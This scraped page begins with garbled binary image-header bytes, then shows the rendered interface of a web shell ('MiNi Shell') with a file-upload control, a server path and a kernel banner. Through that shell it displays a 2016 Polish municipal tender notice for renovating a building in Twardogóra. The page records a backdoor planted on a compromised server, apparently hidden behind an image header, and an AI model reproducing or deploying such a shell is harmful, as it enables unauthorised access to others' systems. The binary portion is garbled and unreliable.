JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160628/106585-N-2016.html

<p class="kh_header"><b>Twardogóra: Przebudowa budynku usługowego na cele administracyjno-biurowo-usługowe wraz z zagospodarowaniem terenu przy ul. 1-go Maja 2 w Twardogórze</b><br>
<b>Numer ogłoszenia: 106585 - 2016; data zamieszczenia: 28.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Twardogóra , ul. Ratuszowa 14, 56-416 Twardogóra, woj. dolnośląskie, tel. 071 3158251, faks 071 3158142.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.twardogora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku usługowego na cele administracyjno-biurowo-usługowe wraz z zagospodarowaniem terenu przy ul. 1-go Maja 2 w Twardogórze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach przedmiotu niniejszego zamówienia przewidziane są do wykonania następujące prace: zagospodarowanie terenu wraz z infrastrukturą poziemną, roboty ogólnobudowlane w zakresie piwnic, parteru, piętra i poddasza użytkowego, dach, elewacje, zapewnienie warunków niezbędnych do korzystania z obiektu przez osoby niepełnosprawne, ochrona p.poż, wyposażenie obiektu. Do zadań oraz czynności wykonawcy należeć będzie wykonanie wszystkich prac określonych w dokumentacji projektowej o której mowa w części 3 SIWZ - opis przedmiotu zamówienia, a w szczególności: 
Zagospodarowanie terenu, w tym: 
wytyczenia i pomiary powykonawcze
miejsca parkingowe, dojścia, dojazdy, chodniki, miejsca na rowery, 
ogrodzenie, mała architektura (ławki, kosze, słupy ogłoszeniowe, słupki dekoracyjne, oświetlenie elewacyjne)
wykonanie podjazdu dla niepełnosprawnych, opaski i zieleń,  
Roboty ogólnobudowlane piwnica, w tym:
roboty rozbiórkowe (stolarka, ścianki, armatura, instalacje, skucia ścian, częściowo strop, okładziny, posadzki i podkłady, pozostałe)
wymiana stolarki okiennej i drzwiowej
wykonanie konstrukcji, fundamentu i podłogi pod podnośnik
posadzki, izolacje, i podkłady betonowe, 
ścianki działowe murowane z cegły i płyt g-k
szyb i konstrukcja wraz z montażem podnośnika dla osób niepełnosprawnych
parapety zewnętrzne i wewnętrzne
malowania ścian i sufitów
wyposażenie meble, umywalki, toalety itd.
dostosowanie obiektu dla osób niepełnosprawnych
izolacje ścian fundamentowych z osuszaniem i naprawą muru, iniekcje silikonowe,
naprawa tynków, montaż krat zabezpieczających
Roboty ogólnobudowlane parter, w tym:
roboty rozbiórkowe (stolarka, ścianki, armatura, instalacje, skucia ścian, częściowo strop, okładziny, stopnice, parapety, pozostałe)
wymiana stolarki okiennej, parapetów i stolarki drzwiowej
wykonanie nowych posadzek i wykończenia ścian w pomieszczeniach
remont istniejących stropów drewnianych, remont stropu Kleina nad piwnicą
remont posadzki na gruncie, remont ścian zewnętrznych, remont ścian wewnętrznych, 
wykonanie nowych ścian wewnętrznych
konstrukcja szybu podnośnika śrubowego, 
zamurowania otworów drzwiowych
dostawa mebli, armatury sanitarnej
remont schodów wewnętrznych
montaż instalacji p.poż (hydrant, rolet p.poż, system oddymiania)
montaż podnośnika śrubowego z kabiną
Roboty ogólnobudowlane piętro, w tym:
roboty rozbiórkowe (stolarka, ścianki, armatura, instalacje, skucia ścian, częściowo strop, okładziny, stopnice, parapety, pozostałe)
wymiana stolarki okiennej, parapetów i stolarki drzwiowej
wykonanie nowych posadzek i wykończenia ścian w pomieszczeniach
remont istniejących stropów drewnianych, 
remont istniejących spoczników na klatkach schodowych
remont istniejących i wykonanie nowych ścian wewnętrznych,
konstrukcja szybu podnośnika śrubowego, 
zamurowania otworów drzwiowych
dostawa mebli, armatury sanitarnej
remont schodów wewnętrznych, wymiana stopnic, remont konstrukcji i balustrad
montaż instalacji p.poż szafka hydrant,
Roboty ogólnobudowlane poddasze użytkowe, w tym:
roboty rozbiórkowe (stolarka, konstrukcje drewniane, ścianki, armatura, instalacje, skucia ścian, częściowo strop, okładziny, stopnice, parapety, pozostałe)
wymiana stolarki okiennej, parapetów i stolarki drzwiowej
wykonanie nowych posadzek i wykończenia ścian w pomieszczeniach
remont istniejących stropów drewnianych, 
remont istniejących spoczników,
remont istniejących i wykonanie nowych ścian wewnętrznych, 
konstrukcja szybu podnośnika śrubowego, 
zamurowania otworów drzwiowych
dostawa mebli, armatury sanitarnej
obudowa palnej konstrukcji dachu płytami
remont schodów wewnętrznych, wymiana stopnic, remont konstrukcji i balustrad
montaż instalacji p.poż szafka hydrant
remont z dociepleniem ściany szczytowej,
montaż okien połaciowych,
Dach w tym:
roboty rozbiórkowe (pokrycie z dachówki wraz z łatami, obróbki blacharskie, rynny i rury spustowe, instalacja odgromowa, tynki kominów, pokrycie z papy wraz z deskowaniem, pozostałe roboty rozbiórkowe)
wymiana pokrycia dachu wg schematu (dach ceramiczny i dach papowy) wraz z izolacją termiczną i obudową
wymiana rynien i rur spustowych, kosze ozdobne, osadniki i czyszczaki
wymiana obróbek blacharskich
montaż ław i stopni kominiarski, okien dachowych, czap kominiarskich i płytek klinkierowych na kominie,
montaż instalacji odgromowej
montaż wywiewek kanalizacji sanitarnej, 
Elewacje w tym:       
roboty rozbiórkowe (skucia tynków, demontaż szyldów, tablic i instalacji, parapety, kraty okienne, wylewki betonowe i płyty betonowe, schody granitowe, ogrodzenie, pozostałe roboty rozbiórkowe)
wykonanie naprawy tynków zewnętrznych z częściową wymianą i całkowitym oczyszczeniem
zagruntowanie i wyrównanie ścian 
wykonanie elewacji nową kolorystyką - tynk silikatowy
wykonanie nowych parapetów z blachy wraz oczyszczeniem i naprawą istniejących z cegły
wymiana obróbek blacharskich
wykonanie nowych tablic oraz elementów artykulacji elewacji (uchwyty na flagi, nr policyjny, szyld wiszący, oprawa oświetleniowa)
wykonanie opasek żwirowych wraz z progiem, balustrad pochylni, montaż wycieraczek, remont skrzynek instalacyjnych, 
wykonanie wypraw tynkarskich cokołu, renowacja drzwiwejściowych, remont studni piwnicznych z montażem krat,
naprawa grzymsu okapowego, reprofilacja elementów, malowanie farbami silikatowymi zgodnie z kolorystyką,
montaż instalacji odgromowej
wykonanie nowego ogrodzenia z prętów oraz tynkowanie podmurówki tynkiem barwionym w masie, zabezpieczenie instalacji napowietrznych
Instalacje sanitarne, w tym:       
wymiana instalacji wod-kan wraz z armaturą
wykonanie instalacji hydrantowej
wymiana instalacji grzewczej
wykonanie instalacji wentylacyjnej nawiewno-wywiewnej, klimatyzacja
Instalacje elektryczne, w tym:
przebudowa układu pomiarowego, wymiana WLZ i rozdzielnica główna
instalacje oświetleniowe i gniazd wtykowych
instalacje oświetlenia ewakuacyjnego
instalacje przeciwprzepięciowe, połączeń wyrównawczych, uziemienia, odgromowa, ochrony od porażeń, przeciwpożarowy wyłącznik prądu,
instalacje nieskoprądowe (oddymianie klatki schodowej)
sieć strukturalna IT
telewizja dozorowa CCTV 
Inne prace dotyczące całego zamierzenia w tym:
rusztowania, daszki ochronne i siatki zabezpieczające
wywóz odpadów, gruzu i utylizacje
prace wynikające z uzgodnień dokumentacji projektowej i sztuki budowlanej,
wynikające z udzielonych wyjaśnień treści SIWZ - jeśli dotyczy
prace porządkowe i zabezpieczające
pomiary, badania, próby
dokumentacja powykonawcza.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.21.00.00-2, 45.42.11.00-5, 45.26.10.00-4, 45.42.11.52-4, 45.34.00.00-2, 45.31.00.00-3, 45.23.32.20-7, 45.33.12.10-1, 45.33.12.30-7, 45.33.20.00-3, 45.33.23.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości 10.000,00zł 
(słownie: dziesięć  tysięcy zł )</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wiedzy i doświadczenia wykonawca w wykazie robót budowlanych musi wykazać: 
minimum 1 zrealizowane zadanie, polegające na remoncie budynku użyteczności publicznej lub budowie, przebudowie, rozbudowie budynku użyteczności publicznej obejmującej wykonanie co najmniej robót ogólnobudowlanych wraz z instalacjami wod-kan, elektrycznymi o wartości nie mniejszej niż 200 tys. zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniającego ten warunek Zamawiający uzna Wykonawcę, który wykaże, że dysponuje osobami posiadającymi następujące kwalifikacje zawodowe:
kierownik budowy posiadający uprawnienia budowlane do kierowania  robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń, posiadającego co najmniej 3-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowania budową</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę przedmiotowego warunku, jeżeli Wykonawca wykaże, że: posiada środki finansowe w wysokości, co najmniej 200 tys. PLN lub posiada zdolność kredytową w wysokości, co najmniej 200 tys. PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - gwarancja - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Zmiana terminu realizacji umowy wraz ze skutkami wprowadzenia takiej zmiany:
a)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
b)	Zmiany spowodowane nadzwyczajnymi warunkami tj. niewypały, niewybuchy, wykopaliska archeologiczne;
c)	zmiany będące następstwem wstrzymania robót przez uprawnione organy z przyczyn nie wynikających z winy wykonawcy i zamawiającego.
d)	działania siły wyższej utrudniającej i uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami
e)	wystąpienia konieczności robót dodatkowych których realizacja ma wpływ na termin wykonania zamówienia, 
f)	wystąpienia okoliczności niezależnych od wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy,
g)	z powodu zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego
h)	wyjątkowo nie sprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów,
i)	Zamawiający dopuszcza możliwość przesunięcia terminu rozpoczęcia zadania  z zastrzeżeniem, że ostateczny termin zakończenia jest niezmienny. Zmiana terminu realizacji jest możliwa tylko za pisemną zgodą Stron w sytuacjach niezawinionych przez strony kontraktu na zasadach opisanych w nim. 
2. Pozostałe zmiany:
a)	z powodu zmiany obowiązującej stawki VAT. W przypadku zmiany stawki VAT przez władzę ustawodawczą kwota brutto wynagrodzenia zostanie zmieniona poprzez wprowadzenie odpowiedniej zmiany do umowy;
b)	Zmiana osób, podwykonawców przy pomocy których Wykonawca realizuje przedmiot umowy w szczególności, np. w przypadku choroby, śmierci, inny wypadek losowy, na inne legitymujące się co najmniej równoważnym doświadczeniem i uprawnieniami, o których mowa w ustawie Prawo budowlane oraz, które wymagane były przez Zamawiającego. Zmiany te będą dokonywane na podstawie zatwierdzonych wniosków przez strony</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.twardogora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Twardogórze, ul. Ratuszowa 14, 56-416 Twardogóra, pok. nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2016 godzina 12:00, miejsce: Urząd Miasta i Gminy w Twardogórze, ul. Ratuszowa 14, 56-416 Twardogóra, pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com